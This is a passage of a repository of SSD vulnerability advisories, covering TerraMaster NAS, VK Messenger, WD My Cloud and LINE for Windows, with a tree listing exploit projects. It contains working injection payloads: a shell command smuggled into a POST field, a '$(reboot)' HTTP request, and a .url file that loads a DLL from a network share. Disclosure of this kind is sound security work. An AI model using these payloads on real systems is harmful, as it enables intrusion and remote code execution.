├── SSD Advisory - 3435
└── readme.md
├── SSD Advisory - 3602
└── readme.md
├── SSD Advisory - 3674
└── readme.md
├── SSD Advisory - 3676
└── readme.md
├── SSD Advisory - 3679
└── readme.md
├── SSD Advisory - 3681
└── readme.md
├── SSD Advisory - 3685
└── readme.md
├── SSD Advisory - 3686
└── readme.md
├── SSD Advisory - 3689
└── readme.md
├── SSD Advisory - 3700
└── readme.md
├── SSD Advisory - 3723
└── readme.md
├── SSD Advisory - 3724
└── readme.md
├── SSD Advisory - 3727
└── readme.md
├── SSD Advisory - 3731
└── readme.md
├── SSD Advisory - 3736
├── exploit
│ ├── poc_vrdpexploit
│ │ ├── vrdpexploit.sln
│ │ └── vrdpexploit
│ │ │ ├── MyHGSMI.cpp
│ │ │ ├── MyMain.cpp
│ │ │ ├── MyMemoryMapper.cpp
│ │ │ ├── VBoxMPCr.cpp
│ │ │ ├── VBoxMPHGSMI.cpp
│ │ │ ├── VBoxMPWddm.cpp
│ │ │ ├── VBoxOGLgen
│ │ │ ├── NULLfuncs.c
│ │ │ ├── cr_gl.h
│ │ │ ├── cr_opcodes.h
│ │ │ ├── cr_packfunctions.h
│ │ │ ├── cropengl.def
│ │ │ ├── debug_opcodes.c
│ │ │ ├── dispatch.c
│ │ │ ├── errorspu.c
│ │ │ ├── feedbackspu.c
│ │ │ ├── feedbackspu_proto.h
│ │ │ ├── feedbackspu_state.c
│ │ │ ├── getprocaddress.c
│ │ │ ├── glloader.c
│ │ │ ├── pack_arrays_swap.c
│ │ │ ├── pack_bbox.c
│ │ │ ├── pack_bounds_swap.c
│ │ │ ├── pack_bufferobject_swap.c
│ │ │ ├── pack_client_swap.c
│ │ │ ├── pack_clipplane_swap.c
│ │ │ ├── pack_current.c
│ │ │ ├── pack_fog_swap.c
│ │ │ ├── pack_lights_swap.c
│ │ │ ├── pack_materials_swap.c
│ │ │ ├── pack_matrices_swap.c
│ │ │ ├── pack_misc_swap.c
│ │ │ ├── pack_pixels_swap.c
│ │ │ ├── pack_point_swap.c
│ │ │ ├── pack_program_swap.c
│ │ │ ├── pack_regcombiner_swap.c
│ │ │ ├── pack_stipple_swap.c
│ │ │ ├── packer.c
│ │ │ ├── packspu.c
│ │ │ ├── packspu_beginend.c
│ │ │ ├── packspu_flush.c
│ │ │ ├── packspu_get.c
│ │ │ ├── packspu_proto.h
│ │ │ ├── passthroughspu.c
│ │ │ ├── server_dispatch.c
│ │ │ ├── server_dispatch.h
│ │ │ ├── server_get.c
│ │ │ ├── server_retval.c
│ │ │ ├── server_simpleget.c
│ │ │ ├── spu_dispatch_table.h
│ │ │ ├── spuchange.c
│ │ │ ├── spucopy.c
│ │ │ ├── state
│ │ │ │ ├── cr_currentpointers.h
│ │ │ │ └── cr_statefuncs.h
│ │ │ ├── state_buffer_gen.c
│ │ │ ├── state_current_gen.c
│ │ │ ├── state_fog_gen.c
│ │ │ ├── state_get.c
│ │ │ ├── state_hint_gen.c
│ │ │ ├── state_isenabled.c
│ │ │ ├── state_lighting_gen.c
│ │ │ ├── state_line_gen.c
│ │ │ ├── state_multisample_gen.c
│ │ │ ├── state_polygon_gen.c
│ │ │ ├── state_regcombiner_gen.c
│ │ │ ├── state_viewport_gen.c
│ │ │ ├── tsfuncs.c
│ │ │ ├── unpack.c
│ │ │ ├── unpack_extend.h
│ │ │ └── windows_exports.asm
│ │ │ ├── _Constants.cpp
│ │ │ ├── iprt
│ │ │ └── nt
│ │ │ │ └── nt.h
│ │ │ ├── product-generated.h
│ │ │ ├── version-generated.h
│ │ │ ├── vrdpexploit.inf
│ │ │ ├── vrdpexploit.vcxproj
│ │ │ ├── vrdpexploit.vcxproj.filters
│ │ │ └── vrdpexploit.vcxproj.user
│ └── poc_vrdpexploit_launcher
│ │ ├── hostid_hijacker
│ │ ├── HostIdHijacker.c
│ │ ├── ReflectiveDll.c
│ │ ├── ReflectiveDllInjection.h
│ │ ├── ReflectiveLoader.c
│ │ ├── ReflectiveLoader.h
│ │ ├── Shellcode.asm
│ │ ├── hostid_hijacker.vcxproj
│ │ ├── hostid_hijacker.vcxproj.filters
│ │ └── hostid_hijacker.vcxproj.user
│ │ ├── vrdpexploit_launcher.sln
│ │ └── vrdpexploit_launcher
│ │ ├── Driver.c
│ │ ├── GetProcAddressR.c
│ │ ├── GetProcAddressR.h
│ │ ├── Inject.c
│ │ ├── LoadLibraryR.c
│ │ ├── LoadLibraryR.h
│ │ ├── Main.c
│ │ ├── Process.c
│ │ ├── ReflectiveDLLInjection.h
│ │ ├── _Constants.c
│ │ ├── vrdpexploit_launcher.vcxproj
│ │ ├── vrdpexploit_launcher.vcxproj.filters
│ │ └── vrdpexploit_launcher.vcxproj.user
└── readme.md
├── SSD Advisory - 3737
└── readme.md
├── SSD Advisory - 3743
└── readme.md
├── SSD Advisory - 3747
└── readme.md
├── SSD Advisory - 3751
└── readme.md
├── SSD Advisory - 3758
└── readme.md
├── SSD Advisory - 3759
└── readme.md
├── SSD Advisory - 3765
└── readme.md
├── SSD Advisory - 3766
└── readme.md
├── SSD Advisory - 3769
└── readme.md
├── SSD Advisory - 3778
└── readme.md
├── SSD Advisory - 3781
└── readme.md
├── SSD Advisory - 3783
└── readme.md
├── SSD Advisory - 3786
└── readme.md
├── SSD Advisory - 3796
└── readme.md
├── SSD Advisory - 3802
└── readme.md
├── SSD Advisory - 3814
└── readme.md
├── SSD Advisory - 3899
└── readme.md
├── SSD Advisory - 3904
└── readme.md
├── SSD Advisory - 3923
└── readme.md
├── SSD Advisory - 3926
└── readme.md
├── SSD Advisory - 3928
└── readme.md
├── SSD Advisory - 3944
├── powend (code)
│ ├── AppDelegate.h
│ ├── AppDelegate.m
│ ├── Assets.xcassets
│ │ ├── AppIcon.appiconset
│ │ │ └── Contents.json
│ │ └── Contents.json
│ ├── Base.lproj
│ │ ├── LaunchScreen.storyboard
│ │ └── Main.storyboard
│ ├── Info.plist
│ ├── ViewController.h
│ ├── ViewController.m
│ ├── code.h
│ ├── main.m
│ ├── mig.c
│ ├── powend.entitlements
│ └── uexploit.c
├── powend.xcodeproj
│ ├── project.pbxproj
│ ├── project.xcworkspace
│ │ ├── contents.xcworkspacedata
│ │ ├── xcshareddata
│ │ │ └── IDEWorkspaceChecks.plist
│ │ └── xcuserdata
│ │ │ └── simo.xcuserdatad
│ │ │ └── UserInterfaceState.xcuserstate
│ └── xcuserdata
│ │ └── simo.xcuserdatad
│ │ ├── xcdebugger
│ │ └── Breakpoints_v2.xcbkptlist
│ │ └── xcschemes
│ │ └── xcschememanagement.plist
├── powendTests
│ ├── Info.plist
│ └── powendTests.m
├── powendUITests
│ ├── Info.plist
│ └── powendUITests.m
└── readme.md
├── SSD Advisory - 3957
└── readme.md
├── SSD Advisory - 3980
└── readme.md
├── SSD Advisory - 3987
└── readme.md
├── SSD Advisory - 3991
├── poc.c
└── readme.md
├── SSD Advisory - 4002
├── poc.c
└── readme.md
├── SSD Advisory - 4007
├── poc
│ ├── avatar.png
│ └── poc.php
└── readme.md
├── SSD Advisory - 4033
├── poc
│ ├── id_xmss
│ └── sshd_config
└── readme.md
├── SSD Advisory - 4047
└── readme.md
├── SSD Advisory - 4066
├── poc
│ ├── IOKit.framework
│ │ └── Versions
│ │ │ └── A
│ │ │ └── IOKit
│ ├── ios_reverseshell
│ ├── iospwn_typhoonPwn_2019.xcodeproj
│ │ ├── project.pbxproj
│ │ ├── project.xcworkspace
│ │ │ ├── contents.xcworkspacedata
│ │ │ └── xcuserdata
│ │ │ │ └── aa.xcuserdatad
│ │ │ │ └── UserInterfaceState.xcuserstate
│ │ ├── xcshareddata
│ │ │ └── xcschemes
│ │ │ │ └── iospwn_typhoonPwn_2019.xcscheme
│ │ └── xcuserdata
│ │ │ └── aa.xcuserdatad
│ │ │ ├── xcdebugger
│ │ │ └── Breakpoints_v2.xcbkptlist
│ │ │ └── xcschemes
│ │ │ └── xcschememanagement.plist
│ ├── iospwn_typhoonPwn_2019
│ │ ├── ALOA_exp.c
│ │ ├── AppDelegate.h
│ │ ├── AppDelegate.m
│ │ ├── Assets.xcassets
│ │ │ ├── AppIcon.appiconset
│ │ │ │ └── Contents.json
│ │ │ └── Contents.json
│ │ ├── BNSA_exp.c
│ │ ├── Base.lproj
│ │ │ ├── LaunchScreen.storyboard
│ │ │ └── Main.storyboard
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ ├── IOTypes.h
│ │ ├── Info.plist
│ │ ├── OSMessageNotification.h
│ │ ├── UHAK_final_exp.c
│ │ ├── ViewController.h
│ │ ├── ViewController.m
│ │ ├── inject.h
│ │ ├── inject.m
│ │ ├── kernel_stru.h
│ │ ├── kernel_stu.c
│ │ ├── main.m
│ │ └── pwned.png
│ └── reverseShell
│ │ ├── bin
│ │ ├── bash
│ │ ├── cat
│ │ ├── chmod
│ │ ├── cp
│ │ ├── date
│ │ ├── dd
│ │ ├── df
│ │ ├── hostname
│ │ ├── kill
│ │ ├── launchctl
│ │ ├── ln
│ │ ├── ls
│ │ ├── mkdir
│ │ ├── mv
│ │ ├── ps
│ │ ├── pwd
│ │ ├── rm
│ │ ├── rmdir
│ │ ├── sh
│ │ ├── sleep
│ │ ├── stty
│ │ └── zsh
│ │ ├── etc
│ │ ├── profile
│ │ └── zshrc
│ │ ├── sbin
│ │ ├── dmesg
│ │ ├── ifconfig
│ │ ├── kextunload
│ │ ├── md5
│ │ ├── mknod
│ │ ├── ping
│ │ └── shutdown
│ │ └── usr
│ │ ├── .DS_Store
│ │ ├── bin
│ │ ├── arch
│ │ ├── chflags
│ │ ├── cut
│ │ ├── du
│ │ ├── false
│ │ ├── find
│ │ ├── fs_usage
│ │ ├── grep
│ │ ├── gunzip
│ │ ├── gzip
│ │ ├── head
│ │ ├── hexdump
│ │ ├── hostinfo
│ │ ├── id
│ │ ├── killall
│ │ ├── less
│ │ ├── login
│ │ ├── lsmp
│ │ ├── more
│ │ ├── nano
│ │ ├── nohup
│ │ ├── passwd
│ │ ├── plconvert
│ │ ├── printf
│ │ ├── renice
│ │ ├── reset
│ │ ├── sc_usage
│ │ ├── scp
│ │ ├── screen
│ │ ├── script
│ │ ├── sed
│ │ ├── seq
│ │ ├── split
│ │ ├── sqlite3
│ │ ├── stat
│ │ ├── syslog
│ │ ├── tail
│ │ ├── tar
│ │ ├── tee
│ │ ├── time
│ │ ├── true
│ │ ├── tset
│ │ ├── uname
│ │ ├── vim
│ │ ├── vm_stat
│ │ ├── wc
│ │ ├── what
│ │ ├── which
│ │ ├── xargs
│ │ └── xxd
│ │ ├── local
│ │ ├── .DS_Store
│ │ ├── bin
│ │ │ ├── dbclient
│ │ │ ├── dropbear
│ │ │ ├── dropbearconvert
│ │ │ ├── dropbearkey
│ │ │ ├── filemon
│ │ │ ├── jtool
│ │ │ ├── procexp
│ │ │ └── wget
│ │ └── lib
│ │ │ ├── .DS_Store
│ │ │ └── zsh
│ │ │ ├── .DS_Store
│ │ │ └── 5.0.8
│ │ │ ├── .DS_Store
│ │ │ └── zsh
│ │ │ ├── attr.so
│ │ │ ├── cap.so
│ │ │ ├── clone.so
│ │ │ ├── compctl.so
│ │ │ ├── complete.so
│ │ │ ├── complist.so
│ │ │ ├── computil.so
│ │ │ ├── curses.so
│ │ │ ├── datetime.so
│ │ │ ├── deltochar.so
│ │ │ ├── example.so
│ │ │ ├── files.so
│ │ │ ├── langinfo.so
│ │ │ ├── mapfile.so
│ │ │ ├── mathfunc.so
│ │ │ ├── newuser.so
│ │ │ ├── parameter.so
│ │ │ ├── regex.so
│ │ │ ├── socket.so
│ │ │ ├── stat.so
│ │ │ ├── system.so
│ │ │ ├── tcp.so
│ │ │ ├── termcap.so
│ │ │ ├── terminfo.so
│ │ │ ├── zftp.so
│ │ │ ├── zle.so
│ │ │ ├── zleparameter.so
│ │ │ ├── zprof.so
│ │ │ ├── zpty.so
│ │ │ ├── zselect.so
│ │ │ └── zutil.so
│ │ ├── sbin
│ │ ├── chown
│ │ ├── ioreg
│ │ ├── kextstat
│ │ ├── ltop
│ │ ├── netstat
│ │ ├── nvram
│ │ ├── sysctl
│ │ └── taskpolicy
│ │ └── share
│ │ ├── .DS_Store
│ │ └── terminfo
│ │ ├── 61
│ │ ├── ansi
│ │ ├── ansi+arrows
│ │ ├── ansi+csr
│ │ ├── ansi+cup
│ │ ├── ansi+enq
│ │ ├── ansi+erase
│ │ ├── ansi+idc
│ │ ├── ansi+idl
│ │ ├── ansi+idl1
│ │ ├── ansi+inittabs
│ │ ├── ansi+local
│ │ ├── ansi+local1
│ │ ├── ansi+pp
│ │ ├── ansi+rca
│ │ ├── ansi+rep
│ │ ├── ansi+sgr
│ │ ├── ansi+sgrbold
│ │ ├── ansi+sgrdim
│ │ ├── ansi+sgrso
│ │ ├── ansi+sgrul
│ │ ├── ansi+tabs
│ │ ├── ansi-color-2-emx
│ │ ├── ansi-color-3-emx
│ │ ├── ansi-emx
│ │ ├── ansi-generic
│ │ ├── ansi-m
│ │ ├── ansi-mini
│ │ ├── ansi-mono
│ │ ├── ansi-mr
│ │ ├── ansi-mtabs
│ │ ├── ansi-nt
│ │ ├── ansi.sys
│ │ ├── ansi.sys-old
│ │ ├── ansi.sysk
│ │ ├── ansi43m
│ │ ├── ansi77
│ │ ├── ansi80x25
│ │ ├── ansi80x25-mono
│ │ ├── ansi80x25-raw
│ │ ├── ansi80x30
│ │ ├── ansi80x30-mono
│ │ ├── ansi80x43
│ │ ├── ansi80x43-mono
│ │ ├── ansi80x50
│ │ ├── ansi80x50-mono
│ │ ├── ansi80x60
│ │ ├── ansi80x60-mono
│ │ ├── ansil
│ │ ├── ansil-mono
│ │ ├── ansis
│ │ ├── ansis-mono
│ │ ├── ansisysk
│ │ └── ansiw
│ │ ├── 73
│ │ ├── screen
│ │ ├── screen+fkeys
│ │ ├── screen-16color
│ │ ├── screen-16color-bce
│ │ ├── screen-16color-bce-s
│ │ ├── screen-16color-s
│ │ ├── screen-256color
│ │ ├── screen-256color-bce
│ │ ├── screen-256color-bce-s
│ │ ├── screen-256color-s
│ │ ├── screen-bce
│ │ ├── screen-s
│ │ ├── screen-w
│ │ ├── screen.linux
│ │ ├── screen.mlterm
│ │ ├── screen.rxvt
│ │ ├── screen.teraterm
│ │ ├── screen.xterm-new
│ │ ├── screen.xterm-r6
│ │ ├── screen.xterm-xfree86
│ │ ├── screen2
│ │ └── screen3
│ │ ├── 76
│ │ ├── vt100
│ │ ├── vt100+
│ │ ├── vt100+enq
│ │ ├── vt100+fnkeys
│ │ ├── vt100+keypad
│ │ ├── vt100+pfkeys
│ │ ├── vt100-am
│ │ ├── vt100-bm
│ │ ├── vt100-bm-o
│ │ ├── vt100-bot-s
│ │ ├── vt100-nam
│ │ ├── vt100-nam-w
│ │ ├── vt100-nav
│ │ ├── vt100-nav-w
│ │ ├── vt100-putty
│ │ ├── vt100-s
│ │ ├── vt100-s-bot
│ │ ├── vt100-s-top
│ │ ├── vt100-top-s
│ │ ├── vt100-vb
│ │ ├── vt100-w
│ │ ├── vt100-w-am
│ │ ├── vt100-w-nam
│ │ ├── vt100-w-nav
│ │ └── vt100nam
│ │ ├── 78
│ │ └── xterm-256color
│ │ ├── .DS_Store
│ │ └── 6c
│ │ ├── linux
│ │ ├── linux-basic
│ │ ├── linux-c
│ │ ├── linux-c-nc
│ │ ├── linux-koi8
│ │ ├── linux-koi8r
│ │ ├── linux-lat
│ │ ├── linux-m
│ │ ├── linux-nic
│ │ ├── linux-vt
│ │ └── linux2.6.26
└── readme.md
├── SSD Advisory - 4099
└── readme.md
├── SSD Advisory - 4100
├── POC
│ └── Invoke-ExploitAnyConnectPathTraversal.psm1
└── readme.md
├── SSD Advisory - 4147
├── POC
│ ├── build.sh
│ ├── fake_cryptodev.h
│ ├── hack.c
│ ├── package.sh
│ ├── spray.c
│ ├── spray.h
│ └── test.sh
└── readme.md
├── SSD Advisory – 3915
└── readme.md
├── license.md
└── readme.md
/SSD Advisory - 3602/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerability Summary**
2 | The following advisory describes an unauthenticated remote command execution vulnerability found in TerraMaster TOS 3.0.33.
3 | TOS is a “Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.”
4 |
5 | **Credit**
6 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
7 |
8 | **Vendor response**
9 | The vendor stated that version 3.1.03 of TerraMaster TOS is no longer affected by this vulnerability; the latest version of the software can be obtained from: http://download.terra-master.com/download.php.
10 |
11 | **Vulnerability details**
12 | User-controlled input is not sufficiently filtered, and an unauthenticated user can execute commands as root by sending a POST request to http://IP/include/ajax/GetTest.php with the following parameters:
13 |
14 | * dev=1
15 | * testtype=;COMMAND-TO-RUN;
16 | * submit=Send
17 |
18 | We can see in the source code that the value of the `testtype` parameter is concatenated into `$line` and passed, unescaped, to `shell_exec()`. Note that `$line` ends up inside a double-quoted shell string (`echo -e "..."`), so a bare `;` is literal there: a payload has to either close the quotes first (`";COMMAND;"`) or use a command substitution such as `$(COMMAND)` or backticks, which the shell expands even inside double quotes. Also note that `dev` is only passed through `basename()` when building the file name — it is interpolated raw into `$line` as well, so it is a second injection point.
19 |
20 | ```php
21 | $file = "/mnt/base/.".basename($data['dev'])."test"; // basename() only sanitizes the file name; the raw $data['dev'] is reused in the shell string below
22 | if(!file_exists($file)) touch($file);
23 | if(isset($data['testtype'])){// start or stop procedure...
24 | if($data['testtype'] != 'stop'){
25 | $line = $data['dev'].':'.$data['testtype'].":".time(); // both request parameters are concatenated unescaped (no escapeshellarg()), as far as this excerpt shows
26 | shell_exec("echo -e \"".$line."\" > $file"); // SINK: $line lands inside the double-quoted echo argument; a `"` closes it, and `$(...)`/backticks are expanded even inside the quotes
27 | }
28 | $return = smartscan($data['dev'],$data['testtype']);
29 | }else{// get status procedure...
30 | $return = smartscan($data['dev']);
31 | }
32 | ```
33 |
34 | **Proof of Concept**
35 | ```html
36 | <!-- The HTML proof-of-concept (original lines 37-40) was stripped when this page was rendered; it is a form that POSTs dev=1, testtype=;COMMAND-TO-RUN; and submit=Send to /include/ajax/GetTest.php. -->
41 | ```
42 |
--------------------------------------------------------------------------------
/SSD Advisory - 3674/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerability Summary**
2 | The following advisory describes a vulnerability in VK Messenger for Windows that is triggered through an improperly handled `vk://` URI: a crafted link can inject additional command-line switches into vk.exe and thereby execute arbitrary code.
3 | VK (VKontakte; [..], meaning InContact) is “an online social media and social networking service. It is available in several languages. VK allows users to message each other publicly or privately, to create groups, public pages and events, share and tag images, audio and video, and to play browser-based games. It is based in Saint Petersburg, Russia”.
4 |
5 | **Credit**
6 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
7 |
8 | **Affected Version**
9 | VK Messenger version 3.1.0.143
10 |
11 | **Vendor Response**
12 | The vendor responded that the problem no longer affects the latest version – but didn’t provide any information on when it was fixed and whether it was fixed due to someone else reporting this vulnerability.
13 |
14 | **Vulnerability Details**
15 | The VK Messenger, which is part of the VK package, registers a uri handler on Windows in the following way:
16 |
17 | ```
18 | [HKEY_CLASSES_ROOT\vk]
19 | "URL Protocol"=""
20 | @="URL:vk"
21 | [HKEY_CLASSES_ROOT\vk\shell]
22 | [HKEY_CLASSES_ROOT\vk\shell\open]
23 | [HKEY_CLASSES_ROOT\vk\shell\open\command]
24 | @="\"C:\\Program Files\\VK\\vk.exe\" \"%1\""
25 | ```
26 |
27 | When the browser hands a `vk://` URI to the registered handler, the URI is substituted into the `%1` placeholder of the command above. Because the application does not sanitize it, extra command-line switches can be injected into vk.exe (evidently a quote character inside the URI closes the quoted `"%1"` argument, after which the remainder is parsed as separate arguments). Injecting the Chromium switch `--gpu-launcher=`, which vk.exe honours, makes it run an arbitrary program; `--browser-subprocess-path=` has the same effect. Network share (UNC) paths are accepted for both, so the payload can be hosted remotely.
28 | Example of attack encoded in HTML entity:
29 |
30 | `` (The HTML-entity-encoded example link was stripped when this page was rendered; it is a `vk://` link whose URI carries one of the switches above pointing at a UNC path.)
31 |
32 | When opening a malicious page, a notification box asks the user to open VK.
33 | NOTE: The application is not in the auto-startup items, and the injection only works when VK is not already running — the switches appear to be honoured only by a freshly launched vk.exe process.
34 |
--------------------------------------------------------------------------------
/SSD Advisory - 3679/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerability Summary**
2 | A vulnerability in the Western Digital My Cloud Pro Series PR2100 allows authenticated users, including low-privilege (non-admin) accounts, to execute arbitrary commands on the device.
3 |
4 | **Credit**
5 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
6 |
7 | **Vendor Response**
8 | The vendor was notified on the 28th of November 2017 and responded that they take security seriously and would fix this vulnerability promptly. Repeated attempts to obtain a timeline or a fix failed; the last update received from them was on the 31st of January 2018, and no further emails sent to the vendor were answered. We are not aware of any fix or remediation for this vulnerability.
9 |
10 | **Vulnerability Details**
11 | In detail, due to a logic flaw, with a forged HTTP request it is possible to bypass the authentication for HTTP basic and HTTP digest login types. (Note that the request below is sent with a valid low-privilege session — see the `PHPSESSID` and `isAdmin=0` cookies — so what it actually demonstrates is authenticated command injection: the `f_user` parameter of the `cmd=7` operation in `home_mgr.cgi` reaches a shell unescaped, and a `$(...)` command substitution inside it is executed.)
12 | Log into the web application using a low privilege user, once the main page loads, find in burp proxy history for a request to `/cgi-bin/home_mgr.cgi`
13 |
14 | ```
15 | POST /cgi-bin/home_mgr.cgi HTTP/1.1
16 | Host: 10.10.10.193
17 | Content-Length: 25
18 | Accept: application/xml, text/xml, */*; q=0.01
19 | Origin: http://10.10.10.193
20 | X-Requested-With: XMLHttpRequest
21 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
23 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
24 | Referer: http://10.10.10.193/
25 | Accept-Language: ko,en-US;q=0.8,ko-KR;q=0.6,en;q=0.4
26 | Cookie: PHPSESSID=650fda9b5fe3a35a5315d85bf929b247; fw_version=2.30.165; username=abcd; local_login=1; isAdmin=0
28 | Connection: close

29 | cmd=7&f_user=abcd$(reboot)
30 | ```
31 |
32 | The last line can be replaced with:
33 | `cmd=7&f_user=abcd$(ping x.x.x.x)`
34 |
35 | Or:
36 | `cmd=7&f_user=abcd$(mkdir /tmp/nshctest)`
37 |
38 | This means any Linux command passed this way is executed by the CGI. The injection is blind — command output is not returned in the HTTP response — so confirm execution through a side effect, as in the examples above: an ICMP callback (`ping` to a host you control) or a file-system artifact (`mkdir /tmp/...`).
39 |
--------------------------------------------------------------------------------
/SSD Advisory - 3724/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerabilities Summary**
2 | LINE for Windows, provided by LINE Corporation, lets the directory it loads plug-in DLLs from be set by a command-line option, and that option can be injected through a crafted `line:` URI. A user clicking a specially crafted link can therefore be made to load an arbitrary, attacker-supplied DLL, which leads to arbitrary code execution in that user's context.
3 |
4 | **Vendor Response**
5 | “We released version 5.8.0 of the modified version LINE PC version (Windows version) on May 31, 2018, and we have automatically updated for all users. The update will be applied automatically on the system side when using the product. Also, when installing the LINE PC version (Windows version) from now on please use the latest installer”.
6 |
7 | **CVE**
8 | CVE-2018-0609
9 |
10 | **Credit**
11 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
12 |
13 | **Affected systems**
14 | LINE for Windows before version 5.8.0
15 |
16 | **Vulnerability Details**
17 | When processing a `line:` or `lineb:` URI, arbitrary command-line parameters can be passed to LINE.exe because the application does not properly parse the URI scheme. In particular, the `-platformpluginpath` parameter accepts network share (UNC) paths. Qt (https://www.qt.io/) loads its plug-ins from sub-directories of the given path — image-format plug-ins from `imageformats` — so an attacker who controls a share can place a DLL at `\\<share>\imageformats\` and have LINE.exe load and execute it remotely.
18 |
19 | **PoC**
20 |
21 | ```html
22 | contact me   <!-- anchor markup stripped by the renderer: an <a href="line://..."> link that injects -platformpluginpath with a UNC path, as in the .url example below -->
23 | contact me 2
24 | ```
25 |
26 | It works with an iframe too.
27 |
28 | ```html
29 | <!-- iframe markup stripped by the renderer: an <iframe> whose src is a line:// URI carrying the same -platformpluginpath parameter -->
30 | ```
31 |
32 | It can also be exploited locally through a `.url` internet-shortcut file (the `file:` case), for example one with the following content. Note the technique: the `"` after `?` closes the quoted `%1` argument so that `-platformpluginpath` is parsed as a separate switch, and the trailing `--` neutralises whatever the handler appends afterwards (presumably the closing quote).
33 |
34 | ```batch
35 | [InternetShortcut]
36 | URL=line://?" -platformpluginpath \\192.168.0.1\uncshare --
37 | ```
38 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.27130.2027
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vrdpexploit", "vrdpexploit\vrdpexploit.vcxproj", "{93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|ARM = Debug|ARM
11 | Debug|ARM64 = Debug|ARM64
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|ARM = Release|ARM
15 | Release|ARM64 = Release|ARM64
16 | Release|x64 = Release|x64
17 | Release|x86 = Release|x86
18 | EndGlobalSection
19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
20 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.ActiveCfg = Debug|ARM
21 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.Build.0 = Debug|ARM
22 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.Deploy.0 = Debug|ARM
23 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.ActiveCfg = Debug|ARM64
24 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.Build.0 = Debug|ARM64
25 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.Deploy.0 = Debug|ARM64
26 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.ActiveCfg = Debug|x64
27 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.Build.0 = Debug|x64
28 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.Deploy.0 = Debug|x64
29 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.ActiveCfg = Debug|x64
30 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.Build.0 = Debug|x64
31 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.Deploy.0 = Debug|x64
32 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.ActiveCfg = Release|ARM
33 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.Build.0 = Release|ARM
34 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.Deploy.0 = Release|ARM
35 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.ActiveCfg = Release|ARM64
36 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.Build.0 = Release|ARM64
37 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.Deploy.0 = Release|ARM64
38 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.ActiveCfg = Release|x64
39 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.Build.0 = Release|x64
40 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.Deploy.0 = Release|x64
41 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.ActiveCfg = Release|Win32
42 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.Build.0 = Release|Win32
43 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.Deploy.0 = Release|Win32
44 | EndGlobalSection
45 | GlobalSection(SolutionProperties) = preSolution
46 | HideSolutionNode = FALSE
47 | EndGlobalSection
48 | GlobalSection(ExtensibilityGlobals) = postSolution
49 | SolutionGuid = {9CAAF34D-70C5-431B-BB32-47E116148B13}
50 | EndGlobalSection
51 | EndGlobal
52 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/MyMemoryMapper.cpp:
--------------------------------------------------------------------------------
1 | #include
2 |
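/*
 * Map a physical address range into the current process's virtual address
 * space by opening the \Device\PhysicalMemory section object and mapping a
 * view of it. Kernel-mode code: uses the Zw* API, OBJ_KERNEL_HANDLE and
 * NtCurrentProcess() (expects the WDK headers -- the #include at the top of
 * this file lost its target in this copy).
 *
 * virtOut  - receives the base address of the mapped view on success
 *            (set to NULL on failure).
 * phys     - physical start address. Per the ZwMapViewOfSection contract the
 *            kernel may round the section offset down to the allocation
 *            granularity; the base written to *virtOut is what it mapped.
 * physLen  - number of bytes to map; only QuadPart is used.
 *
 * Returns STATUS_SUCCESS, STATUS_INVALID_PARAMETER for a NULL virtOut, or the
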